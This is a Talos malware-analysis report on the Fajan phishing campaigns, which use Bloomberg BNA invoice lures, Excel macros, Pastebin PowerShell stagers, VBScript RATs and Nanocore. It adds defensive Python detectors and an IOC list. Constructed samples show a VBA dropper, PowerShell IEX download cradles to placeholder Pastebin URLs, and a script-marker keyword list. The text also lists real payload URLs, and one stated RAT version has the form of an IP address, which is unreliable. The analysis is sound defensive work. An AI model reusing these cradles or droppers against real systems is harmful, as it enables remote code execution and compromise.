By Vanja Svajcer.
- Some malware campaigns are designed to spread malware to as many people as possible, while others carefully choose their targets. Cisco Talos recently discovered a malware campaign that does not fit neatly into either category. We have recovered a relatively low volume of samples from this actor, which makes it difficult to decide whether the campaigns are carefully targeted or mass-spammed.
- Cisco Talos recently discovered a series of low volume email campaigns we're calling "Fajan," targeting users with Bloomberg BNA-based email messages since at least March 2020.
- These threats demonstrate several techniques of the MITRE ATT&CK framework, most notably Scripting - T1064, PowerShell - T1059.001, Process Injection - T1055, Non-Standard Port - T1571, Remote Access Software - T1219, Input Capture - T1056, Obfuscated Files or Information - T1027 and Registry Run Keys / Startup Folder - T1547.001.
The campaigns are likely the work of a single actor who keeps experimenting with various TTPs to make the campaigns more difficult to detect and more successful.
We believe this is the first time anyone has documented Fajan's operations. The actor is actively maintaining the tools and has been active since March 2020. Based on the observed IOCs and TTPs, we have moderate confidence that the actor is an Arabic-speaking person or group.
How did it work?
The infection starts with an email containing a message which pretends to come from Bloomberg's BNA division — a site dedicated to providing legal and regulatory information to professionals. The email contains an Excel spreadsheet as an attachment, containing macro code to either download the next infection stage or drop and run the final payload.
The payload is always a RAT that allows the attacker to take control over the infected system using HTTP over a non-standard TCP port.
The actors behind the Fajan campaigns are actively maintaining and developing functionality to make the attacks more successful. The campaigns use email, which remains the most common initial vector in successful compromises. The inclusion of remote access trojans as the campaign payloads indicates the actors may want to carry out surveillance operations or steal user data. The C2 servers were not responsive at the time of analysis, so we could not discover the final objective of the campaigns.
All Fajan email messages contain basic content that purportedly informs a subscriber of the Bloomberg BNA service that they owe a payment, and include an Excel spreadsheet as an attachment.
The attachment name always contains some form of the Bloomberg BNA Invoice name combined with a random number specific to a particular campaign. Some early examples of campaign email messages contain a second attachment: a copy of the email body text as a clean RTF file.
Example of a Fajan email campaign from April 2020.
The phone number included in Fajan's emails seems to be a private phone number located in New York, and is likely unrelated to the actor's true phone number.
Excel attachment VBA macro code
Each Bloomberg-themed campaign attachment contains VBA code that differs from other, similar campaigns. The changes may have been generated by an automated tool and, in some instances, may even have been hand-coded by the actor.
The VBA code is lightly obfuscated to break up the most obvious strings, such as the filenames. The actors hope these small changes will be sufficient to make detection more difficult. One notable feature of most Fajan droppers is that they place some of the content into Excel spreadsheet cells, which may make emulation of the code and detection more difficult. Detection logic that only inspects the contents of the usual macro streams never sees fragments stored in cells, so the macro can reassemble its strings from the worksheet at runtime and still look innocuous to such a scanner.
Excel cells containing malicious code snippets used by VBA macros.
The second example we give here is a VBA dropper that drops and executes a VBScript-based payload with the filename "webstyle.vbs."
VBA macro to drop and execute webstyle.vbs.
The VBA macro code almost always ends with a snippet that deletes the contents of the cells hosting fragments of malicious code and writes additional, legitimate-looking content into the first cells of the worksheet. The VBA code is rendered unusable after running once, but the document becomes slightly more difficult to discover in a post-infection investigation.
Cleanup VBA code toward the end of the Workbook_Open function.
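To make the cell-hosting trick concrete, here is an added analysis helper written for this article (it is not Talos code and not the actor's macro). It takes VBA text as a tool such as olevba would extract it, plus a map of worksheet cell values, replaces reads such as Range("Z50").Value and Cells(52, 26).Value with the literals those cells hold, folds & concatenations so the real strings appear, and checks for the ClearContents cleanup described above. The VBA snippet and the cell layout are constructed to mimic the pattern; they are not taken from the real attachments.

```python
import re

# Constructed worksheet contents in the style the post describes: string fragments
# parked in out-of-the-way cells. Assumed layout, not the real attachment.
CELLS = {
    "A1": "",
    "Z50": "web",
    "Z51": "style",
    "Z52": ".vbs",
    "Z53": "WScript.Shell",
}

# Constructed VBA mimicking the dropper pattern: cell reads, & concatenation,
# a run, then the cleanup that wipes the fragment cells and rewrites A1.
VBA = '''Private Sub Workbook_Open()
    Dim p As String
    p = Environ("TEMP") & "\\" & Range("Z50").Value & Range("Z51").Value & Cells(52, 26).Value
    Set sh = CreateObject(Range("Z53").Value)
    sh.Run p, 0, False
    Range("Z50:Z53").ClearContents
    Range("A1").Value = "Bloomberg BNA Invoice"
End Sub'''

# Only cell *reads*: the negative lookahead skips assignments like Range("A1").Value = ...
RANGE_RE = re.compile(r'Range\("([A-Z]+\d+)"\)\.Value(?!\s*=[^=])')
CELLS_RE = re.compile(r'Cells\((\d+),\s*(\d+)\)\.Value(?!\s*=[^=])')
STR_RE = r'"((?:[^"]|"")*)"'                       # a VBA string literal ("" escapes a quote)
CONCAT_RE = re.compile(STR_RE + r'(?:\s*&\s*' + STR_RE + r')+')


def col_letters(n):
    """1-based column index to Excel letters: 26 -> 'Z', 27 -> 'AA'."""
    s = ""
    while n:
        n, r = divmod(n - 1, 26)
        s = chr(65 + r) + s
    return s


def vba_literal(text):
    return '"' + text.replace('"', '""') + '"'


def resolve_cells(vba, cells):
    """Replace every cell read with the quoted literal that cell holds."""
    vba = RANGE_RE.sub(lambda m: vba_literal(cells.get(m.group(1), "")), vba)
    return CELLS_RE.sub(
        lambda m: vba_literal(cells.get(col_letters(int(m.group(2))) + m.group(1), "")), vba)


def fold_concat(vba):
    """Collapse "a" & "b" & "c" into "abc" so the reassembled strings become visible."""
    def join(m):
        parts = re.findall(STR_RE, m.group(0))
        return vba_literal("".join(p.replace('""', '"') for p in parts))
    return CONCAT_RE.sub(join, vba)


def deobfuscate(vba, cells):
    return fold_concat(resolve_cells(vba, cells))


def recovered_strings(vba, cells):
    """String literals visible after resolving cells and folding concatenations."""
    return [s.replace('""', '"') for s in re.findall(STR_RE, deobfuscate(vba, cells))]


def cleanup_present(vba):
    """True when the macro wipes cells and rewrites the first cell: the post-run cleanup."""
    return ".ClearContents" in vba and re.search(r'Range\("A1"\)\.Value\s*=', vba) is not None


if __name__ == "__main__":
    print(deobfuscate(VBA, CELLS))
    print("recovered:", recovered_strings(VBA, CELLS))
    print("cleanup present:", cleanup_present(VBA))
```

Run against the constructed sample, the resolved macro shows the dropped filename (webstyle.vbs) and the WScript.Shell object that the macro stream alone never contains, which is exactly what a string-based detection needs to see. In a real triage the cell map would come from the parsed workbook and the VBA from olevba; the resolver does not need to emulate VBA, only to substitute cell reads.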
Excel 4.0 formula macros
Approximately 60 percent of the attachments use VBA to drop and run a malicious payload. The rest contain Excel 4.0 macro formulas designed to execute when the file is opened. All of them contain simple code that runs a PowerShell command line to download and execute the next stage from a Pastebin URL. The raw content of the Pastebin URL is passed to the Invoke-Expression (IEX) cmdlet, which executes the downloaded code in memory without writing it to disk.
Excel 4.0 macro formula downloader code.
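The practical place to catch this stage is the process-creation event the formula produces: Excel spawning PowerShell with an IEX download cradle. The following added example (my code, not from the post or the actor) decodes -EncodedCommand when present, then flags the IEX-plus-download combination, any pastebin.com/raw URL and an Office parent process. The three process records are constructed, and the paste IDs are placeholders, not the ones in the IOC section.

```python
import base64
import re

# Constructed process-creation records (parent image, command line); not real telemetry.
SAMPLES = [
    ("EXCEL.EXE",
     'powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'https://pastebin.com/raw/AAAAAAAA\')"'),
    ("EXCEL.EXE",
     "powershell -nop -enc " + base64.b64encode(
         "iex ((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/BBBBBBBB'))"
         .encode("utf-16le")).decode()),
    ("explorer.exe",
     'powershell -Command "Get-Service | Where-Object Status -eq Running"'),
]

# -e, -ec, -enc ... are all accepted abbreviations of -EncodedCommand.
ENC_RE = re.compile(r'\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)', re.I)
CRADLE_RE = re.compile(r'\b(?:iex|invoke-expression)\b', re.I)
FETCH_RE = re.compile(
    r'downloadstring|downloaddata|downloadfile|invoke-webrequest|invoke-restmethod'
    r'|\biwr\b|\birm\b|net\.webclient', re.I)
PASTE_RE = re.compile(r'https?://pastebin\.com/raw/[A-Za-z0-9]+', re.I)
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}


def normalize(cmdline):
    """Return the script text that would actually run, decoding -EncodedCommand (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def analyze(parent, cmdline):
    """Score one process-creation record; two or more hits is the Fajan-style downloader pattern."""
    script = normalize(cmdline)
    hits = []
    if parent.lower() in OFFICE and "powershell" in cmdline.lower():
        hits.append("office_spawned_powershell")
    if CRADLE_RE.search(script) and FETCH_RE.search(script):
        hits.append("iex_download_cradle")
    hits.extend("pastebin_raw:" + u for u in PASTE_RE.findall(script))
    return {"script": script, "hits": hits, "suspicious": len(hits) >= 2}


if __name__ == "__main__":
    for parent, cmd in SAMPLES:
        print(parent, analyze(parent, cmd))
```

The decode step matters because the Excel 4.0 and VBA variants can hand PowerShell the same cradle in clear text or as base64 UTF-16LE; matching only the raw command line misses the second form. Blocking pastebin.com/raw at the proxy is a cheap complement for environments that have no business need for it.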
Intermediate stages
It is not entirely clear why one or more intermediate stages are used, as the attack can be stopped by blocking any individual stage, and the more stages there are, the more opportunities defenders have to detect the chain. The extra stages may be there to conceal the location of the final payload, or to give the actors the flexibility to swap the payload by changing the content of an intermediate stage rather than the attachment.
Pastebins — simple PowerShell downloaders
All of the retrieved Pastebins contain code to download and run a payload from the free file-sharing site Top4top.io. The one exception is an early example whose URL points to a payload hosted on the Amazon S3 service.
One outlier downloader from Pastebin with the payload hosted using the Amazon S3 storage service.
Top4top.io is a free file-sharing site that is popular among users in Egypt, Algeria and Yemen, according to its Cisco Umbrella domain requester distribution. The Top4top URLs in the intermediate stages usually look like media files (.jpg, .mp4, .mp3), but the downloaded files are VBScript payloads with filenames such as "c.vbs" or "NoSleep.vbs".
NoSleep.vbs, a final payload is downloaded from Top4Top.io.
Top4Top.io seems to be aware of the frequent abuse of the site, as there is a dedicated section for reporting it to the operators of the site, which is hosted by OVH.
In some cases, the Top4Top intermediate stage was already removed after an abuse report.
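Because the intermediate URLs carry media extensions but deliver script, a content check that ignores the extension is a useful control on a proxy or in a sandbox. The added example below (not from the post) sniffs magic bytes for the extensions seen in the IOC list (.jpg, .mp4, .mp3), falls back to a printable-text heuristic with VBScript and PowerShell markers, and reports a mismatch between what the URL claims and what the bytes are. The three bodies and their URLs are constructed placeholders.

```python
import os
import string
from urllib.parse import urlparse

# Magic-byte signatures for the media types the lure URLs pretend to be: (offset, bytes).
MAGIC = {
    "jpeg": [(0, b"\xff\xd8\xff")],
    "png":  [(0, b"\x89PNG\r\n\x1a\n")],
    "mp3":  [(0, b"ID3"), (0, b"\xff\xfb"), (0, b"\xff\xf3")],
    "mp4":  [(4, b"ftyp")],
}
EXT_TO_TYPE = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".mp3": "mp3", ".mp4": "mp4"}
SCRIPT_MARKERS = (b"createobject", b"wscript", b"execute(", b"eval(", b"powershell",
                  b"iex ", b"invoke-expression", b"<script")
PRINTABLE = set(string.printable.encode())

# Constructed sample bodies; the URLs are placeholders, not the IOCs from the post.
SAMPLES = {
    "https://files.example.invalid/m_0000x.mp4":
        b'Set sh = CreateObject("WScript.Shell")\r\n'
        b'sh.Run "powershell -w hidden -c ...", 0, False\r\n',
    "https://files.example.invalid/p_0000y.jpg":
        b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 64,
    "https://files.example.invalid/v_0000z.mp4":
        b"\x00\x00\x00\x18ftypisom\x00\x00\x02\x00isomiso2" + b"\x00" * 64,
}


def sniff(data):
    """Classify a body by magic bytes, falling back to a text/script heuristic."""
    for kind, sigs in MAGIC.items():
        for off, sig in sigs:
            if data[off:off + len(sig)] == sig:
                return kind
    head = data[:512]
    if head and sum(c in PRINTABLE for c in head) / len(head) > 0.95:
        low = head.lower()
        return "script" if any(m in low for m in SCRIPT_MARKERS) else "text"
    return "unknown"


def check(url, data):
    """Compare what the URL's extension claims with what the bytes actually are."""
    ext = os.path.splitext(urlparse(url).path)[1].lower()
    claimed = EXT_TO_TYPE.get(ext, "unknown")
    actual = sniff(data)
    return {
        "url": url,
        "claimed": claimed,
        "actual": actual,
        # A media extension delivering text or script is the pattern described in the post.
        "suspicious": claimed != "unknown" and actual in ("script", "text"),
    }


if __name__ == "__main__":
    for url, body in SAMPLES.items():
        print(check(url, body))
```

The heuristic deliberately keys on the body, not on the Content-Type header, because a file-sharing site will happily serve whatever was uploaded under whatever name it was given; the extension is chosen by the uploader and carries no information about the content.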
The client expects the C2 server to send commands and parameters in an HTTP response; a typical command downloads and runs additional modules from a URL. Here, we see an example of the command "RF," which creates another script file in the user's Temporary folder and runs it using the Run method of the WScript.Shell ActiveX object.
- Sc: Download a script file into the user's Temp folder and run it.
- Ex: Execute downloaded code using the eval function
- RF: Same as Sc
VBScript payloads
The payload in the Pastebin download branch is a lightly obfuscated VBScript that can be easily deobfuscated.
Obfuscated Nosleep.vbs payload.
Other similar scripts have been uploaded to VirusTotal. Their authorship is claimed by an actor with the handle "Security.Najaf." This may imply that the Fajan author is based in Iraq, although it could also be a coincidence or a false flag.
It is also possible that we are dealing with an entirely different actor who is simply reusing the available script code or employing a code generator developed by Security.Najaf. Nevertheless, we decided to name the campaigns Fajan, after reversing the string the RAT uses to split the command sent from the C2 server.
A snippet of Fajan VBScript-based RAT code.
Here is the list of supported commands by one version of a VBScript based RAT:
- Exc: Create a file in the user's temp folder, download and save the content and run the file.
- Nim: Download and save a file in the user's Startup folder, using the filename supplied by the C2 server.
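To show how the C2 protocol described above and the two command lists fit together, here is an added parser (mine, not the actor's script and not Talos code) that turns one C2 response into a structured, non-executing description an analyst can use to pull IOCs from captured traffic. The separator is "najaF", which follows from the naming explanation above; the argument order per command (URL first, filename second for Nim) and the response bodies are assumptions for this example.

```python
# "Fajan" reversed: the post says the name comes from reversing the string the RAT
# splits C2 commands on. Argument layout below is assumed for this example.
SEP = "najaF"

# Command table assembled from the two command lists in the post:
# (what the RAT does, expected argument names, ATT&CK technique).
COMMANDS = {
    "Sc":  ("download a script into %TEMP% and run it", ("url",), "T1059"),
    "RF":  ("download a script into %TEMP% and run it (alias of Sc)", ("url",), "T1059"),
    "Ex":  ("eval() the received code inside the running script", ("code",), "T1059"),
    "Exc": ("create a file in %TEMP%, download content into it, run it", ("url",), "T1059"),
    "Nim": ("save a file into the Startup folder under the supplied name",
            ("url", "filename"), "T1547.001"),
}


def parse_response(body):
    """Split one C2 HTTP response body into a structured description. Nothing is executed."""
    parts = body.split(SEP)
    cmd, args = parts[0].strip(), parts[1:]
    entry = COMMANDS.get(cmd)
    if entry is None:
        return {"command": cmd, "known": False, "args": args}
    action, names, technique = entry
    params = dict(zip(names, args))
    return {
        "command": cmd, "known": True, "action": action, "technique": technique,
        "params": params, "extra_args": args[len(names):],
        "persistence": cmd == "Nim",                     # Startup folder write
        "iocs": [v for k, v in params.items() if k == "url"],
    }


def triage(bodies):
    """Summarise several captured responses: URLs to block, persistence, unknown verbs."""
    parsed = [parse_response(b) for b in bodies]
    return {
        "urls": sorted({u for p in parsed for u in p.get("iocs", [])}),
        "persistence": any(p.get("persistence") for p in parsed),
        "unknown": [p["command"] for p in parsed if not p["known"]],
    }


# Constructed responses in the assumed format; URLs are placeholders.
CONSTRUCTED = [
    "Sc" + SEP + "https://example.invalid/a.vbs",
    "Nim" + SEP + "https://example.invalid/up.vbs" + SEP + "update.vbs",
    "Ex" + SEP + 'MsgBox "hello"',
    "Zz" + SEP + "whatever",
]

if __name__ == "__main__":
    for body in CONSTRUCTED:
        print(parse_response(body))
    print(triage(CONSTRUCTED))
```

Unknown verbs are reported rather than dropped: a new command in a captured response is the quickest sign that the actor has shipped a newer RAT version than the one analysed here.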
Nanocore RAT payload
One exception to the usual pattern of dropping or downloading a script-based payload is an instance discovered on Feb. 16, 2021. Here, we are dealing with an almost identical email campaign, but the Excel file is a bit different.
A Fajan campaign, but with the Nanocore RAT downloader as the payload. The attachment size differs and the attachment naming scheme is slightly different.
Instead of downloading the next stage from Pastebin or dropping a final payload, the VBA macro drops and executes a VBScript-based downloader.
VBScript-based downloader dropped and executed by the VBA macro code.
Once again, the payload loader is downloaded from the Top4Top.io file-sharing site. The content of the loader is downloaded into memory and contains PowerShell code very similar to what we previously described in our post about recent Masslogger campaigns.
Nanocore payload stored as a lightly obfuscated PowerShell string.
This indicates that the actors behind Fajan and those behind the related MassLogger and Agent Tesla campaigns use a similar toolkit to generate the .NET DLL assembly loaders, which decode the payload and load it into the process space of the legitimate Windows process msbuild.exe.
Nanocore payload is injected into a msbuild.exe instance.
Nanocore is a well-known commercial trojan that has been available for sale since 2013. The author was arrested in 2017 and sentenced to 33 months in prison. Development of Nanocore stopped after that, but some versions have been cracked and are widely used by attackers.
The Nanocore client is written in C# and contains a resource segment with the configuration information which is extracted, decompressed and decrypted when the client is launched.
Nanocore configuration reading function.
Once decrypted, the configuration can be dumped from memory. Alternatively, a Nanocore dumper tool released by Mario Henkel can be used to extract the information from the client without debugging.
We extracted the configuration information from the client; it shows version 18.104.22.168, one of the cracked versions. The build date for the campaign executed on Feb. 16 was listed as Jan. 11, 2021, and the C2 server was 22.214.171.124 on TCP port 83.
Dumped Nanocore configuration.
Nanocore is a modular RAT with a plugin ecosystem that lets the operator embed additional plugins into the final payload using the Nanocore Builder tool.
Nanocore GUI displaying the available plugins.
This specific payload was configured to include the following plugins:
- Client Plugin: Handles communications with the C2 server.
- Core Plugin: Additional functions to collect recon about the client.
- Management Plugin: Remote console, remote registry editor, file browser, task manager.
- Network Plugin: Additional network support such as reverse SOCKS proxy.
- Security Plugin: Access to client firewall and anti-malware configuration.
- Surveillance Plugin: Password stealing and keylogging.
- SurveillanceEx Plugin: Remote desktop support, video and audio capture.
- Tools Plugin: Miscellaneous functions, instant messaging, memory and process cleanup.
Infection chains observed in Fajan campaigns.
We've examined sustained campaigns using Bloomberg BNA-themed email messages as the initial infection vector. Fajan's author has been actively developing the campaigns since at least March 2020. We named the campaigns "Fajan" after a string in the body of a script payload that may indicate its author.
There is not enough information to tell whether these campaigns are targeted or indiscriminate. We also do not yet have enough information to determine the final goal of the campaigns: the final payload is a general-purpose RAT that can remotely control infected systems and install additional software, so the objective depends on what the operator does after infection.
Nevertheless, we feel it is important to document Fajan's activities to show how the actor is varying TTPs over a period of time and to describe different techniques used to make the campaigns more successful.
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such as this automatically.
Cisco Secure Email can block malicious emails sent by threat actors as part of their campaign.
Cisco Secure Malware Analytics helps identify malicious binaries and builds protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Excel attachments
5893cbdb7d3f443668a3d48c3d1ab559d33bafe553e0e988c5d32889276229e5 - 02.16.2021
7bb5a4d74b493666671bda32e8e056a4cc53144b2892ae408c6530c3a9c97b58 - 02.15.2021
d5f5ddf9f82f0b757883d8e0fa319c95f2c30a10436ba820384967822ddd9fc8 - 01.27/28.2021
6c229a383854798275d687519fe363b24f7f568482ca1fc77d68e9aa9c902613 - 06.11.2020
0bea13a67c5cf17b1039823a1835855535bfbd3ac808461ae78fa26f77a79171 - 03.15.2021
e1743dfaefdafb712d6b70d0c31d662359e028805dd5fdfe7a7239e5ce569c1a - 04.17.2020
f59fbaed1d475b840800b2ad5c56ffb984db16c194d2a2c09a7f4d851cb99388 - 02.03.2021
f2b0beea8f515e170a9696c64d86f1ce9b4fd1d8c52c34411421c3cd1989476c - 02.10.2021
87146ae8db88ce1c2b11c0b2896a95f7eeded4b21c88517619bbebbe39791a12 - 05.12.2020
e0250920e3e226a650c027a87ff10dd33295cc1853ad06eb3ea1d7a99a5a96a1 - 08.12.2020
943b70f97713875e8e7bd5487b5dd1aa6745df26ce2eba37737207ee86092b8b - 03.22.2021
4772923cf1f5af42d84a91257cab8d7a9461ba629659b4abe6b9a1b7357d47d4 - 03.08.2021
49e109a4d9fa02c06e9473ee72a3754cfc34591366add7936113dcd6258a8051 - 04.06.2021
bc847cdc5b4f6874f60bdb369ac2fe411df29a815e3028281bfb34263ddda2d8 - 04.12.2021
Payloads and downloaders
570cd232c24dd7733a688f6e7373baf5f493ff65ed198346a6728b79551c77b1 - Dropped by 49e109a4d9fa02c06e9473ee72a3754cfc34591366add7936113dcd6258a8051
f95c808947724e26359848c28a25dfd2881f4f3bdd9d861e1990b66abeade09e - Dropped by 5893cbdb7d3f443668a3d48c3d1ab559d33bafe553e0e988c5d32889276229e5
128644d8ea3bbcaac05e927288d20bb91cd344fda0e422f9aab34e63b3bb07f2 - Dropped by 0bea13a67c5cf17b1039823a1835855535bfbd3ac808461ae78fa26f77a79171
fc13c0b783207753c85cfe8d31bc214a187606933586ca36d502d113e87f5ea2 - VBS downloader dropped by 7bb5a4d74b493666671bda32e8e056a4cc53144b2892ae408c6530c3a9c97b58
0aaab7302254def2fe9449364995eb95b9c3896fe435a701a129556b845e0cd6 - Dropped by 943b70f97713875e8e7bd5487b5dd1aa6745df26ce2eba37737207ee86092b8b
120e6fe44d30a8fb22882ac084669ccae70379f8e70569b5b8efd8bf305f8380 - Dropped by d5f5ddf9f82f0b757883d8e0fa319c95f2c30a10436ba820384967822ddd9fc8
e924952bacf7d5d5f076a8a4529a1e3934c0224d09b57d6616b6b5ec7f39a478 - Payload simple VBS RAT
11aec399f195ab749cf2b7005e5ca7389b513aa08e0d67a72fb970f88730a657 - NanoCore DLLLoader/Injector from VB source
66fe2551210e4aa15195e49a1d16e19a5cd5dbe53d5605c7b4cc72d2dc015566 - NanoCore Payload
52f152ea653f725d55da186ee416408c2ee8a55b31119a50a5693aea0449ecab - Payload downloaded from https://k.top4top.io/p_1893s178y1.jpg
3b07a293b7a9a3dfd5371c13e5691a3275f914429e2d9e33d834055e9ddc38ba - NanoCore RAT PowerShell main loader
URLs
https://e.top4top.io/m_1593v3zvv1.mp4 - Payload
https://k.top4top.io/p_1893s178y1.jpg - Payload
https://pastebin.com/raw/STGGsHfq - Pastebin PowerShell
https://pastebin.com/raw/fASw9wCZ - Pastebin PowerShell
https://pastebin.com/raw/TB8DyWCt - Pastebin PowerShell
https://pastebin.com/raw/v3YMf04z - Pastebin PowerShell
https://pastebin.com/raw/MESH21tR - Pastebin PowerShell
https://i.top4top.io/p_1869b2cpe1.jpg - NanoCore RAT VB.NET source
https://blob-ap-south-1-ukyez4.s3.ap-south-1.amazonaws.com/sara/0e/0e4d/0e4d1215-3079-468d-9188-6eb6a8e0df14.bin?response-content-disposition=attachment%3B%20filename%3D%22news.vbs%22&response-content-type=&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAI75SICYCOZ7DPWTA%2F20200417%2Fap-south-1%2Fs3%2Faws4_request&X-Amz-Date=20200417T170615Z&X-Amz-SignedHeaders=host&X-Amz-Expires=1800&X-Amz-Signature=9fbebca4d882e098045c835add71a9b652dfddd7f0fb529974116f4066ac8f0a - Payload on S3
https://d.top4top.io/m_15684cm0o1.mp3 - Payload
IP addresses
126.96.36.199 - C2 server - Romania
188.8.131.52 - C2 server - Romania; also seen with Netwire and RevengeRAT
184.108.40.206 - C2 server - Romania
220.127.116.11:83 - C2 server - Nanocore - Switzerland; known C2 IP for other families such as XpertRAT